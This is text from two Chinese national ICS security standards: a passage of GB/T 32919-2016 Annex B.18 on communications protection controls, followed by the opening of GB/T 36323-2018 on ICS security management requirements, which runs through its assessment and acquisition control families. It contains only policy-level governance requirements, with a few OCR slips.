b) 管理接口使用边界保护设备,例如包括:在一个有效安全体系结构(例如:驻留在称为非军事 区或 DMZ的受保护子网中受到防火墙和应用网关保护的路由器)中所组织的代理,网关,路 由器,防火墙,门禁,或加密隧道。 c) 在安全控制的实现以及这样服务中,组织要考虑商业电子通信服务的固有共享本质。 d) 一般地,公共访问ICS 的信息是不允许的。 e) 相关安全控制:AC-4、AC-17、CA-3、CM-7、CP-8、IR-4、RA-3、SC-5、SC-13。 控制增强: a) 组织通过不同的物理网络接口,真正把公共可访问的ICS 部件分配给不同的子网。 b) ICS阻止公共访问到组织的内部网络,除非通过管理接口进行合适的调解,使用边界保护设备。 c) 组织限制 ICS 访问点的数量,以便允许更全面的监视通信边界内外的网络流量。 d) 组织应: 1) 为每一个外部电子通信服务实现一个管理接口; 2) 为每一个管理接口建立一个通信流策略; 3) 当需要时,使用安全控制来保护正在传送的那些信息的保密性和完整性; 4) 为每一个支持使命/业务需要以及持续需要的通信流策略的例外,建立相应的文档; 5) 按【赋值:组织定义的时间间隔】,评审通信流策略的例外; 6) 去除不再被显式的使命和业务需要的通信流策略例外。 e) 在管理接口上的控制系统,拒绝默认的网络流量,允许除了例外的网络流量(即拒绝所有例外 的流量)。 f) 当出现边界保护机制运行失效时,组织禁止未授权地释放ICS 边界之外的信息,或未授权地经 GB/T 32919—2016 过 ICS 边界的通信。 增强补充指导: 1) 组织选择一种合适的失效模式(例如,失败是封闭的,失败是开放的)。 g) ICS 禁止远程设备与系统建立非远程的连接,以防与外边的、具有外部网络资源的通信路径进 行通信。 h) ICS 按【赋值:组织定义的通信流量】,通过边界保护设备管理外部网络。 增强补充指导: 1) 外部网络是组织控制之外的网络; 2) 代理服务器支持登入个体的传输控制协议(TCP) 会话,并锁死特定的统一资源分配 (URL) 、 域名和互联网协议地址; 3) 代理服务按【赋值:组织定义的授权网站和未授权网站】。 i) 在管理接口上的 ICS, 拒绝解析外部 ICS 威胁的网络流量并审计内部用户。 增强补充指导: 1) 可以解析一个对外部系统的安全威胁的检测内部活动,有时是使用穷举检测; 2) 在ICS 边界上的穷举检测分析,包括网络流量(流入和流出的)监控,以便指示对外部系统 安全的内部威胁。 j) 组织禁止未授权地过度过滤通过管理接口的信息。 增强补充指导: 1) 严格控制协议格式; 2) 对系统报警进行监控; 3) 对加密进行监控; 4) 除非需要断开所有外部网络连接; 5) 对数据报文头进行必要的拆装和组装; 6) 对网络流量进行分析。 k) 检测通信进人,以确保该通信是从授权源进人的,并路由到授权目标。 1) 实现基于主机的边界保护机制。 增强补充指导: 1) 基于主机的边界保护机制,其例子是基于主机的防火墙。 m) 组织通过物理上不同的子网以及对该系统其他部分的管理接口,把【赋值:组织定义的关键信 息安全工具】与其他内部 ICS 部件隔离开来。 n) 实现保护边界,防止穿过边界保护机制的未授权物理连接。 o) ICS 通过指定的管理接口,按访问控制和审计的意图,路由所有网络化的授权访问。 p) ICS 禁止揭示构成一个管理接口的特定系统部件(或设备)。 增强补充指导: 1) 期望通过该控制增强来保护 ICS 部件的网络地址,这样的地址是管理接口的一部分,可 通过通用根据和技术来发现的,以便标识一个网络上的设备; 2) 网络地址要求在了解访问知识之前,是不能予以揭示的(例如:不能发布或进入域名系 统)。 q) 组织使用自动化机制,严格符合协议格式。 增强补充指导: 1) 严格符合协议格式所使用的自动化机制,其例子有包深度检测防火墙和XML 网关; 2) 这些设备在应用层上验证是否符合协议的规格说明,并支持标识在网络上或传输层上运 行的设备不可能检测到的大量脆弱性。 GB/T 32919-2016 B.18.8 传输完整性(SC-8) 控制: a) ICS 应保护传输信息的完整性。 补充指导: a) 该控制适用于内外网之间的通信; b) 如果组织依赖商业服务方提供传输服务,作为一种商品项,而完全不是一个贡献性服务,那么 传输完整性所需要的安全控制的实现,就可能更难获得必要的保障; c) 当实际上不可能通过合同方式获得必要的有效安全控制和保障时,组织要么实现合适的补偿 安全控制,要么就显式地接受附加的风险; d) 相关安全控制:AC-17 、PE-4。 控制增强: a) 组织应使用加密机制来识别传输中对信息的改变。 增强补充指导: 1) 在认真考虑安全需要和系统性能上的潜在结果的基础上,确定要使用的密码技术。例如, 组织考虑使用密码技术是否对该ICS 运行性能引入了负面影响的潜在因素。组织揭示所 有可能的密码技术完整性机制(例如,数字签名,哈什函数),每一机制均有不同的延迟 影响。 b) ICS 维护准备传输中信息汇聚期间、打包期间和传输期间的信息完整性。 增强补充指导: 1) 在数据汇聚点或协议传送点上,信息可能被有意或恶意的修改,损害信息的完整性。 c) 组织应使用加密技术,来实现数字签名。 B.18.9 传输机密性(SC-9) 控制: a) ICS 应保护传输信息的保密性。 补充指导: a) 该控制适用于内外网之间的通信; b) 如果组织依赖商业服务方提供传输服务,传输保密性所需要的安全控制是必要的; c) 当实际上不可能通过合同方式获得必要的有效安全控制和保障时,组织要么实现合适的补偿 安全控制,要么就显式地接受附加的风险; d) 相关安全控制:AC-17、PE-4。 控制增强: a) 组织使用加密机制来防止传输中对信息的未授权泄露; 增强补充指导: 1) ICS 的安全目的通常具有保密性,完整性和可用性的有序优先级; 2) 在认真考虑安全需要和系统性能上的潜在结果的基础上,确定要使用的密码技术。例如, 组织考虑使用密码技术是否对该ICS 运行性能引入了负面影响的潜在因素。 b) ICS 维护准备传输中信息汇聚期间、打包期间和传输期间的信息保密性; c) 组织使用密码技术,来保护传输中受控的非秘密信息; d) 当用于传输秘密的、涉及国家安全信息的网络之等级低于被传输的信息之等级时,组织使用 密码技术,来保护该信息; e) 组织使用密码技术,来保护网络上同样秘密等级的信息,当这样信息必须与没有必要的访问批 GB/T 32919—2016 准的个体予以隔离时; f) 组织使用密码技术,来保护传输中秘密的、涉及国家安全的信息; g) 组织使用密码技术,来保护传输中源信息和方法信息。 B.18.10 网络中断(SC-10) 控制: a) 在会话结束时或在不活动的时间周期之后,ICS应终止与该通信会话相关的网络连接。 补充指导: a) 该控制适用于内外网; b) 终止与通信会话相关的网络连接,例如包括重新分配开发系统层上所关联的 TCP/IP 地址/端 口对,或重新分配应用层上的网络指派,如果多应用会话使用一个开放系统层的网络连接 的话; c) 不活动的时间周期作为组织认为必要的时间周期,可以是网络访问类型的一个时间周期的集 合,或是特定访问的一个时间周期的集合; d) 在一个会话结束上或在【赋值:组织定义的非活动时间段】之后,ICS 不能终止网络连接的情况 下,或由于对性能,安全(safety) 或可靠性具有重大负面影响,ICS 不能终止网络连接的情况 下,组织按裁剪指导,使用补偿控制(例如,提供更强的审计措施,限制关键人员的远程访问特 权)。 控制增强:无 B.18.11 密钥建立与管理(SC-11) 控制: a) 组织应为 ICS 内所需要的密码技术,建立并管理加密密钥。 补充指导: a) 加密密钥的建立和管理,可以通过使用人为的规程或支持人为规程的自动化机制予以实施。 b) 相关安全控制:SC-13。 控制增强: a) 组织维护用户丢失加密密钥的事件中的信息的可用性; b) 组织使用密钥管理技术和过程,产生、控制和分布对称加密密钥; c) 组织使用密钥管理技术和过程,产生、控制和分布对称或非对称加密密钥; d) 组织使用批准的3级证书或前置密钥化资料的 PK1, 产生、控制和分布非对称加密密钥 e) 组织使用批准的3级证书或4级证书以及保护用户私钥的PKI, 产生、控制和分布非对称加 密密钥。 增强补充指导: 1) 在认真考虑安全需要和系统性能上的潜在结果的基础上,确定要使用的密钥,包括密钥管 理。例如,组织考虑使用密码技术是否对该ICS 运行性能引入了负面影响的潜在因素。 2) 期望在 ICS 中使用密钥管理来支持内部非公共的使用。 B.18.12 密码技术的使用(SC-12) 控制: a) ICS 应使用符合相关法律、法规、方针政策、规章制度、标准和指南的密码模块,实现所需要的 密码技术的保护。 补充指导: GB/T 32919—2016 a) 使用密码技术应遵守相关标准和法律规定。 b) 密码技术的使用应不影响 ICS 正常运行。 c) 相关安全控制:AC-2、AC-3、AC-7、AC-17、AC-18、AU-9、AU-10、CM-11、CP-9、IA-3、IA-7、 MA-4、MP-2、MP-4、MP-5、SA-4、SC-8、SC-12、SI-7。 控制增强:无 B.18.13 公共访问保护(SC-13) 控制: a) ICS 应保护公共可用信息和应用的完整性和可用性。 补充指导: a) 该控制的意图是,确保组织显式地强调公共信息和应用的保护需求,以及与可能实现的、作为 其他安全控制一部分的这样保护的关联; b) 一般地,对 ICS 的公共访问是不允许的。 控制增强: a) ICS 应禁止公共访问。 B.18.14 安全属性的传输(SC-14) 控制: a) ICS 应将安全属性与系统间交换的信息关联起来。 补充指导: a) 安全属性可以显式地或隐式地与 ICS 中所包含的信息相关联; b) 与该控制有关的控制有:AC-3、AC-1、AC-16。 控制增强: a) ICS 验证系统间交换的安全属性的完整性。 B.18.15 证书管理(SC-15) 控制: a) 组织应按合适的证书策略发布公钥证书或按合适的证书策略从批准的服务提供方那里获得公 钥证书。 补充指导; a) 对于用户证书,每个组织按策略的要求,从一个得到批准的、共享的服务提供方那里获得证书; b) 该控制关注证书及系统外的可见性; c) 相关安全控制:SC-12。 控制增强:无 B.18.16 移动代码(SC-16) 控制: 组织应: a) 定义可接受的和不可接受的移动代码及移动代码技术; b) 对可接受的移动代码及移动代码技术,建立用法限制和实现指南; c) 授权、监视并控制 ICS 中移动代码的使用。 补充指导: a) 基于移动代码的恶意使用可能对 ICS 导致破坏,组织应就ICS 是否使用移动代码做出相应的 决策; b) 代码技术,例如包括:Java,JavaScript,ActiveX,PDF,VBScript 等; c) 用法限制和实现指南适用于安装在组织服务器端的移动代码,也适应于工作站和移动设备; d) 与移动代码相关的策略和规程,强调了防止ICS 中不可接受的移动代码的开发、获得或引人 e) 相关安全控制:AU-2、AU-12、CM-2、CM-6、SI-3。 控制增强: a) 为了标识未授权的移动代码,ICS 实现发现和检查机制,必要时采取纠正措施。 增强补充指导: 1) 发现未授权移动代码时,纠正措施包括:锁定、隔离和报警等。 b) 组织应确保部署在 ICS 中的移动代码的获得、开发和使用满足【赋值:组织定义的移动代码】 需求。 c) ICS 禁止下载和执行已禁止的移动代码。 d) ICS 禁止在软件应用中自动执行移动代码。 B.18.17 会话鉴别(SC-17) 控制: a) ICS 应提供保护通信会话真实性的机制。 补充指导: a) 该控制关注通信会话保护; b) 该控制的目的是建立每一通信会话的信任基础; c) 该控制仅在组织认为必要时实现; d) 在ICS 不能保护通信会话真实性的情况下,组织应按裁剪指南,使用补偿控制(例如,审计措 施); e) 相关安全控制:SC-8、SC-10、SC-11。 控制增强: a) ICS 应在用户退出或终止会话后让会话身份标识符失效; b) ICS 应提供明显容易的退出功能; c) ICS 应为每一会话生成唯一的会话身份标识符,并仅认可系统生成的会话身份标识符; d) ICS 应按【赋值:组织定义的随机需求】,生成唯一的会话身份标识符。 B.18.18 已知状态中的失效(SC-18) 控制: a) 针对【赋值:组织定义的失效类型】,ICS 失效于【赋值:组织定义的已知状态】,保持失效中系统 状态信息。 补充指导: a) 在已知状态中失效,可按组织的使命和业务需要来强调安全。 b) 在已知状态中失效,有助于防止在ICS 和部件失效事件中丧失保密性、完整性和可用性。 c) 在已知安全状态中失效,有助于防止系统失效导致损害个体或破坏特性的状态。 d) 保留ICS 状态信息,可支持系统对使命和业务过程的较少破坏,重新启动并返回到组织的运 行模式。 e) 相关安全控制:CP-2、CP-10、CP-12、SC-7。 控制增强:无 GB/T 32919-2016 B.18.19 剩余信息保护(SC-19) 控制: a) ICS 应保护剩余信息的保密性和完整性。 补充指导: a) 该控制的目的是剩余信息的保密性和完整性保护。 b) 组织可选择不同的机制来实现保密性和完整性保护。 c) 相关安全控制:AC-3、AC-6、CA-7、CM-3、CM-5、CM-6、PE-3、SC-8、SC-13、SI-3、SI-7。 控制增强: a) 应确保 ICS 内的文件、目录和数据等资源所在的存储空间,被释放或重新分配给其他用户前得 到完全清除; b) 应保证用户鉴别信息等敏感信息所在的存储空间被释放或再分配给其他用户前得到完全 清除; c) 可提供加密机制保护剩余信息的保密性和完整性。 增强补充指导: 1) 加密机制是保护组织信息的保密性和完整性的基础,组织应根据安全需求来选择对应强度的 加密机制。 B.18.20 执行程序隔离 (SC-20) 控制: a) 组织应让ICS 各类执行程序运行在相互隔离的域中。 补充指导: a) 让 ICS 各类执行程序运行在相互隔离的域中,并各自使用分离的地址空间,处于分离的地址空 间的各可执行程序异常时不会影响其他程序; b) ICS 产品所采用的操作系统一般均正常地址空间分离; c) 相关安全控制:AC-3、AC-4、AC-6、SA-4、SA-5、SA-8、SC-2、SC-3。 控制增强: a) 采用硬件分离实现可执行程序隔离。
standards
信息安全技术 工业控制系统安全管理基本要求 引 言 随着计算机和网络技术的发展,特别是信息化与工业化深度融合以及物联网的快速发展,工业控制 系统,包括分布式控制系统(DCS) 、监控与数据采集(SCADA) 系统和可编程逻辑控制器(PLC) 等产品 广泛应用于核设施、航空航天、先进制造、石油石化、油气管网、电力系统、交通运输、水利枢纽、城市设施 等国家重要领域。工业控制系统(ICS) 由单机走向互联、从封闭走向开放、从自动化走向智能化进程的 加快,使得工业控制系统的信息安全问题日益突出,工业控制系统一旦遭受攻击,将严重威胁人民生命 财产安全和国家政权稳定。对此,全国信息安全标准化技术委员会(SAC/TC 260)立项研制了工业控 制系统信息安全分级、管理要求、控制应用指南等多项标准。 本标准针对各行业工业控制系统的安全管理活动的共性特点,提出了工业控制系统安全管理基本 框架,从领导、规划、支持、运行、绩效评价和持续改进等方面为工业控制系统安全管理活动提出了规范 性要求,并给出了为实现该安全管理基本框架所需的安全管理基本控制措施和各级工业控制系统安全 管理基本控制措施对应表,以满足组织对各级工业控制系统的安全管理需求,为实现对工业控制系统适 度、有效的安全管理控制提供参考。 信息安全技术 工业控制系统安全管理基本要求 1 范围 本标准规定了工业控制系统安全管理基本框架及该框架包含的各关键活动,并提出为实现该安全 管理基本框架所需的工业控制系统安全管理基本控制措施,在此基础上,给出了各级工业控制系统安全 管理基本控制措施对应表(参见附录 A), 用于对各级工业控制系统安全管理提出安全管理基本控制 要求。 本标准适用于非涉及国家秘密的工业控制系统建设、运行、使用、管理等相关方进行工业控制系统 安全管理的规划和落实,也可供工业控制系统安全测评与安全检查工作作为参考依据。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 25069—2010 信息安全技术 术语 GB/T 22080—2016 信息技术 安全技术 信息安全管理体系 要求 GB/T 22081—2016 信息技术 安全技术 信息安全控制实践指南 GB/T 32919—2016 信息安全技术 工业控制系统安全控制应用指南 3 术语和定义 GB/T 22080—2016、GB/T 22081—2016、GB/T 25069—2010界定的以及下列术语和定义适用于 本文件。 3.1 工业控制系统 industrial control system;ICS 工业生产中使用的控制系统,包括监控和数据采集系统(SCADA), 分布式控制系统(DCS), 和其他 较小的控制系统,如可编程逻辑控制器(PLC) 等。 3.2 分布式控制系统 distributed control system;DCS 以计算机为基础,在系统内部(单位内部)对生产过程进行分布控制、集中管理的系统。 注:DCS 系统一般包括现场控制级、控制管理级两个层次,现场控制级主要是对单个子过程进行控制,控制管理级 主要是对多个分散的子过程进行数据采集、集中显示、统一调度和管理。 3.3 监控和数据采集系统 supervisory control and data acquisition system 工业生产控制过程中,对大规模远距离地理分布的资产和设备在广域网环境下进行集中式数据采 集与监控管理的控制系统。 注:它以计算机为基础,对远程分布运行设备进行监控调度,其主要功能包括数据采集、参数测量和调节、信号报警 等。SCADA 系统一般由设在控制中心的主终端控制单元(MTU)、通信线路和设备、远程终端单位(RTU) 等组成。 3.4 可编程逻辑控制器 programmable logic controller;PLC 采用可编程存储器,通过数字运算操作对工业生产装备进行控制的电子设备。 注:PLC 主要执行各类运算、顺序控制、定时等指令,用于控制工业生产装备的动作,是工业控制系统的基础单元。 3.5 安全控制基线 security control baseline 安全控制选择过程的起始点和选择基点。 注:安全控制基线是为帮助组织选择满足安全需求的、最具成本效益的、适当的安全控制集而制定的最低安全基 准线。 4 缩略语 下列缩略语适用于本文件。 AC: 访问控制(Access Control) AT: 意识和培训(Awareness and Training) AU: 审计和可核查性(Audit and Accountability) CA: 安全评估和授权(Security Assessment and Authorization) CM: 配置管理(Configuration Management) CP: 应急规划(Contingency Planning) DCS: 分布式控制系统(Distributed Control System) IA: 标识和鉴别(Identification and Authentication) ICS:工业控制系统(Industrial Control System) IR: 事件响应(Incident Response) MA: 维护(Maintenance) MP:介质保护(Media Protection) PE: 物理和环境安全(Physical and Environmental Protection) PL:规划(Planning) PLC: 可编程逻辑控制器(Programmable Logic Controller) PS: 人员安全(Personnel Security) RA: 风险评估(Risk Assessment) SA: 系统与服务获取(System and Services Acquisition) SCADA: 数据监控与数据采集系统(Supervisory Control and Data Acquisition) SI: 系统和信息完整性(System and Information Integrity) 5 ICS 安全管理基本框架及关键活动 5.1 ICS 安全管理基本框架 工业控制系统(ICS) 与传统的信息技术(IT) 系统存在的诸多重要差异决定了应在规划和管理 ICS 信息安全过程中考虑ICS 自身的特点。参考传统信息安全管理体系,结合 ICS 自身特点,将安全性需 求整合到ICS 中,形成了ICS 安全管理基本框架(如图1所示)。该框架在确定ICS 安全管理具体意图, 理解需求期望并明确 ICS 体系范围的基础上,将 ICS 安全管理活动分为顶层承诺、规划评估、资源支 持、策略实施、绩效评价、持续改进六个方面。其中,顶层承诺方面需要组织获得管理层的承诺,确定 ICS 安全管理的方针,明确组织各相关成员在 ICS 管理活动中的角色和权责;规划评估中组织应确定规划总则,开展 ICS 安全风险评估和处置,明确目标和实现规划;在资源支持部分组织应保障 ICS 安全所 需的资源,提供能力和意识培训,确定沟通机制并建立文档化制度;策略实施方面组织应规划、实现和控 制满足 ICS 安全管理活动要求的具体过程,定期开展 ICS 安全风险评估和处置工作;在绩效评价阶段, 组织对 ICS 开展监视、测量、分析和评价,定期开展内部审核和管理评审;持续改进阶段组织应对 ICS 的安全开展持续监控,在发生 ICS 安全异常等情况下,开展纠正措施并持续改进。 为具体实现 ICS 安全管理基本框架各阶段的安全功能,本标准在第6章给出了ICS 安全管理基本 框架各阶段所需的基本控制措施,并在附录 A 中给出了针对不同级别的工业控制系统安全管理要求对 应表,用以指导组织根据自身工业控制系统的不同安全级别选择安全管理基本控制措施,并根据工业控 制系统安全控制应用指南、安全分级等相关标准,对所选安全管理基本控制措施进行剪裁、选择等操作。 5.2 顶层承诺 5.2.1 管理层承诺 组织应依据 GB/T 22080—2016 的5.1作出针对 ICS 安全的承诺。 5.2.2 方针 组织应依据GB/T 22080—2016 的5.2 制定适用于 ICS 安全的方针,此外,还应制定相应的将 ICS 安全的方针与组织信息安全整体方针保持一致,并作为其有机组成部分。 5.2.3 成立 ICS安全联合管理团队 为确保ICS 安全的实施落实,组织应: a) 建立跨部门、跨职能的 ICS 安全联合管理团队; b) 该管理团队应至少包括 IT 人员、控制工程师、控制系统操作员、网络和信息系统安全专家、管 理层代表,以及物理安全部门代表; c) 最高管理层应确保该团队开展ICS 安全管理活动的权利和责任,并提供相应承诺。 5.2.4 组织的角色、责任和权限 最高管理层应确保与ICS 信息安全相关角色的责任和权限得到分配和沟通。 最高管理层应分配责任和权限,以便达到以下目标: a) 确保 ICS 安全管理基本框架符合本标准的要求; GB/T 36323—2018 b) 向最高管理者报告 ICS 安全管理基本框架绩效; c) 接受联合管理团队的定期汇报。 5.3 规划评估 5.3.1 应对风险和机会的措施 5.3.1.1 总则 组织应依据 GB/T 22080—2016 中6.1.1作出针对ICS 总则,同时还应在总则中加入对于ICS 安全 运行和维护的期望。 5.3.1.2 ICS 信息安全风险评估 组织应依据 GB/T 22080—2016 中6.1.2定义并应用针对ICS 的风险评估过程,同时还应充分论证 风险评估过程对 ICS 的可用性和稳定性产生的后果,以确保工业生产活动的正常开展。 5.3.1.3 ICS 信息安全风险处置 组织应依据 GB/T 22080—2016 中6.1.3 定义并应用ICS 信息安全风险处置过程。 5.3.2 ICS 信息安全目标及其实现规划 组织应依据 GB/T 22080—2016 中6.2建立针对ICS 信息安全的目标及其实现规划。 5.4 资源支持 5.4.1 资源 组织应确定并提供建立、实现、维护和持续改进 ICS 信息安全管理体系所需的资源。 5.4.2 能力 见 GB/T 22080—2016中7.2。 5.4.3 意识 应定期开展教育培训,并确保在组织控制下工作的人员了解: a) ICS 信息安全方针; b) 其对 ICS 安全管理基本框架有效性的贡献,包括改进 ICS 信息安全绩效带来的益处; c) 不符合ICS 安全管理基本框架要求带来的影响。 5.4.4 沟通 见 GB/T 22080—2016 中7.4。 5.5 策略实施 5.5.1 运行规划和控制 组织应依据GB/T 22080—2016中8.1开展针对 ICS 信息安全的运行规划和控制工作,同时还应: a) 在针对 ICS 实施安全控制措施前,详细评估该安全控制对 ICS 可能造成的危害; b) 在具体实施安全控制措施前,应获得安全控制措施授权。 5.5.2 ICS 信息安全风险评估 组织应依据 GB/T 22080—2016中8.1开展针对 ICS 信息安全的风险评估工作。在风险评估过程 中,依据GB/T 32919—2016 附录 A 中的内容,充分考虑 ICS 与传统信息系统的差异性。 5.5.3 ICS 信息安全风险处置 见 GB/T 22080—2016 中8.3,并依据ICS 特点开展风险处置。 5.6 绩效评价 5.6.1 监视、测量、分析和评价 见 GB/T 22080—2016 中9.1,同时还应持续监控已实施的安全控制措施,识别安全违规事件,检测 ICS 中的安全异常事件的发生。 5.6.2 内部审核 见 GB/T 22080—2016中9.2,并依据 ICS 特点开展内部审核。 5.6.3 管理评审 见 GB/T 22080—2016 中9.3,并依据ICS 特点开展管理评审。 5.7 持续改进 5.7.1 不符合及纠正措施 见 GB/T 22080—2016中10.1,并依据ICS 特点采取纠正措施。 5.7.2 持续改进 组织应持续改进 ICS 安全管理基本框架的适宜性、充分性和有效性,并在 ICS 生产业务或系统安 全防护发生重大变更时向联合管理团队和最高管理层汇报。 6 ICS 安全管理基本控制措施 6.1 安全控制措施分类 本标准从管理制度、运维管理和技术管理三方面给出安全控制,共十六个安全控制族,其对照关系 如 族标识符 安全控制族 安全控制类 CA 安全评估和授权(Security Assessment and Authorization) 管理制度 SA 系统和服务获取(System and Services Acquisition) 管理制度 PL 规划(Planning) 管理制度 RA 风险评估(Risk Assessment) 管理制度 PS 人员安全(Personnel Security) 运维管理 CP 应急规划(Contingency Planning) 运维管理 PE 物理和环境安全(Physical and Environmental Protection) 运维管理 CM 配置管理(Configuration Management) 运维管理 SI 系统和信息完整性(System and Information Integrity) 运维管理 MP 介质保护(Media Protection) 运维管理 IR 事件响应(Incident Response) 运维管理 AT 意识和培训(Awareness and Training) 运维管理 MA 维护(Maintenance) 运维管理 AC 访问控制(Access Control) 技术管理 AU 审计和可核查性(Audit and Accountability) 技术管理 IA 标识和鉴别(Identification and Authentication) 技术管理 6.2 安全评估和授权(CA) 6.2.1 安全评估和授权方针策略及规程(CA-1) 本项要求包括: a) 应制定并发布安全评估和授权策略及规程方针策略,内容至少应包括:目的、范围、角色、责任、 管理层承诺、相关部门间的协调和合规性; b) 应制定并发布安全评估和授权方针策略及规程,以推动安全评估和授权策略及与相关安全控 制的实施; c) 应定期对安全评估与授权策略和规程进行评审和更新。 6.2.2 安全评估(CA-2) 本项要求包括: a) 应制定安全评估计划,该评估计划应包括:应评估的安全控制措施;判定安全措施有效性的评 估流程;评估环境、队伍、角色及责任; b) 应定期对 ICS 采取的安全措施实施的正确性、有效性进行评估,并判断是否满足相关安全 需求; c) 应根据评估结果生成评估报告,并向相关人员报告评估结果; d) 应授权独立且具有评审资质的机构进行评估,并确保评估不干扰 ICS 运行和功能; e) 应确保评估人员充分了解信息安全相关方针策略和规程,ICS 的安全方针策略和规程,以及特 定的设备和/或工艺相关的具体的安全、环境风险; f) 对于不能直接采取在线评估的 ICS, 应采取离线评估或在复制系统中进行。 6.2.3 ICS 连接管理(CA-3) 本项要求包括: a) 应制定 ICS 互联安全规定,授权 ICS 与外部其他信息系统进行连接; b) 应对 ICS 与外部其他工业控制系统连接的接口特征、安全要求、通信信息特性等内容进行 记录; c) 应定期评审ICS 与外部的连接情况,以验证ICS 连接是否符合规定要求; d) 应阻止把未分保密等级的国家安全系统直接连接到外部网络; e) 应阻止把具有保密等级的国家安全系统直接连接到外部网络。 6.2.4 行动计划与时间节点(CA-4) 本项要求包括: a) 制定行动计划和时间节点,在其中记录下拟采取的整改行动,以改正在安全控制措施评估中发 现的弱点和不足,减少或消除系统中的已知漏洞; b) 根据安全评估、后果分析和持续监控的情况,每季度至少更新一次现有的行动计划和时间 节点; c) 组织应使用有助于实施计划准确、适时和到时可用的自动化机制。 6.2.5 安全授权(CA-5) 本项要求包括: a) 应指定一位高层管理人员作为 ICS 的授权责任人; b) ICS 未经授权责任人正式授权,不得投入运行; c) 应对 ICS 定期或发生重大变更时,重新进行安全授权; d) 应识别并定期评审反应组织机构信息保护需要的保密性或不泄露协议的要求; e) 开发、测试和运行设施应分离,以减少未授权访问或改变运行系统的风险。 6.2.6 持续监控(CA-6) 本项要求包括: a) 应制定持续的监控策略,并实施持续的监控计划,计划内容包括:被监控的目标、监控的频率、 以及对监控进行评估的频率; b) 应使用独立评估人员或评估组织,在持续的基础上来监视工业控制系统的安全控制; c) 组织应定期规划、安排并进行评估,公开或不公开该评估信息,以便确保符合所有脆弱性缓解 过程; d) 应根据组织的连续监控策略,实施安全控制评估; e) 应根据组织的连续监控战略,对组织已确定的度量指标,进行安全状态监控; f) 应对评估和监控产生的安全相关信息进行关联和分析,并根据分析结果,采取相应的响应 措施; g) 应定期向相关人员报告信息系统安全状态。 6.2.7 渗透测试(CA-7) 本项要求包括: a) 应定期对 ICS 进行渗透测试,要明确渗透测试的频率与目标; b) 组织应聘请专业的第三方渗透组织或团队对 ICS 开展渗透测试; c) 对 ICS 系统渗透测试,应在 ICS 系统非在线状态或在复制系统中进行。 6.2.8 内部系统的连接(CA-8) 本项要求包括: a) 应授权组织定义的ICS 系统或组件连接到内部信息系统; b) 应为每个内部连接建立文件,包括连接的接口特性,安全性要求和传输信息的性质; c) 在建立内部连接前,在 ICS 系统或组件上执行安全合规性检查。 6.3 系统和服务获取(SA) 6.3.1 系统及服务获取的方针策略及规程(SA-1) 本项要求包括: a) 应制定并发布系统服务及获取的方针策略,内容至少应包括:目的、范围、角色、责任、管理层承 诺、相关部门的协调及合规性; b) 应制定并发布系统服务及获取的规程,以推动系统服务及获取的方针策略及与相关安全控制 的实施; c) 应定期对系统服务及获取的方针策略及规程进行评审和更新。 6.3.2 资源配置(SA-2) 本项要求包括: a) 应在业务过程规划中明确提出ICS 或系统服务的安全需求; b) 应明确、配置保护信息系统及相关服务所需的资源,形成相关文档并将其作为资本计划和投资 管理过程的组成部分; c) 应在组织的工作计划和预算文件中考虑信息安全。 6.3.3 系统开发生命周期(SA-3) 本项要求包括: a) 应在ICS 的开发生命周期内实施全生命周期的安全管理,并将信息安全风险管理过程集成到 ICS 的开发生命周期活动中; b) 应明确 ICS 开发生命周期内的信息安全角色及责任,并明确相应的责任人; c) 应在ICS 开发的各阶段应用安全工程原则。 6.3.4 采购过程(SA-4) 本项要求包括: a) 在 ICS 采购合同中,应明确描述系统的预期运行环境、开发环境及验收标准,并提出系统的安 全功能、安全增强、安全保障及安全文档需求; b) 采购合同内容应遵守相关的法律、法规、规章、标准或指南; c) 组织应要求供应商或合同方在文档中提供描述该ICS 及其部件和服务中所使用的那些安全控 制的功能特性信息,而这些信息应是相当详细的,以至于可对安全控制进行分析和测试; d) 组织应要求供应商或合同方在文档中提供描述该ICS 及其部件和服务中所使用的那些安全控 制的设计和实现的详细信息,以至于可对安全控制进行分析和测试; e) 组织应要求软件供应商或制造方证实他们的软件开发过程使用了安全的工程方法、质量控制 过程和确认技术,使软件弱点和恶意最小化; f) 组织应选取市场上已通过国家安全相关部门评估的、具有安全能力的信息技术产品,并在获取 前对其进行评估和确认; g) 组织应确保所获取的每一个部件显式地分配给一个 ICS, 并且系统拥有者承认该分配; h) 组织应要求获取文档中的ICS 部件,以安全和规定的配置方式予以交付,并且该安全配置对任 何软件重新安装或调整均是默认的配置; i) 组织应有限制地获取市场上现成信息技术产品,这些产品应是那些已通过国家安全相关部门 评估的产品和技术; j) 为了保护公共发布的信息免遭恶意的干扰或破坏,并确保它的可用性,组织应确保使用了市场 上具有基本的信息保障能力的信息技术产品; k) 当信息向公共网传输时,或当信息对那些未被授权访问 ICS 中所有信息的个体是可访问的时 候,为了保护受控的非机密信息,组织应确保使用市场上基本信息保障能力的信息技术产品; 1) 当使用的网络在比该网络较低的机密层上来传输该信息时,为了保护国家机密的安全信息,仅 使用市场上高信息安全保障能力的信息技术产品;确保高信息安全保障能力的信息技术产品 已通过国家安全相关部门的评估和确认。 6.3.5 ICS 信息系统文档(SA-5) 本项要求包括: a) 应提供描述系统、组件或服务的管理员文档,文档应包括:系统、组件、服务及安全功能的安装、 配置、使用、管理及运行维护信息以及系统管理员功能相关的脆弱性; b) 应提供描述系统、组件或服务的用户文档,文档应包括:用户可访问的安全功能描述及其有效 使用方法;用户对系统、组件或服务的安全使用方法及安全维护责任; c) 当文档不可用时或不存在时,记录应获得的ICS 文档; d) 当需要时,获取并保护描述 ICS 中所使用的安全控制的功能特性的文档,该文档具有充分的详 细程度,允许对其中功能特性进行分析和测试,从而使文档对授权人员、供应商、制造者是可 用的; e) 当需要时,获取并保护描述了ICS 与安全有关的外部接口文档,该文档应充分详细,允许对其 中外部接口进行分析和测试,从而使文档对授权人员、供应商、制造者是可用的; f) 当需要时,获取并保护以子系统以及安全控制的实现细节来描述 ICS 高层设计的文档,并具有 充分的详细程度,允许对其中的子系统和实现细节进行分析和测试,从而使文档对授权人员、 供应商、制造者是可用的; g) 当需要时,获取并保护描述了ICS 与安全有关外部接口的文档,该文档具有充分的详细程度 允许对其中外部接口进行分析和测试,从而使文档对授权人员、供应商、制造者是可用的; h) 当需要时,获取和保护 ICS 的源码,并对授权人员是可用的,允许进行分析和测试; i) 应基于风险管理策略要求对 ICS 文档进行保护; j) ICS 文档应分发到指定的角色或个人。 6.3.6 外部 ICS 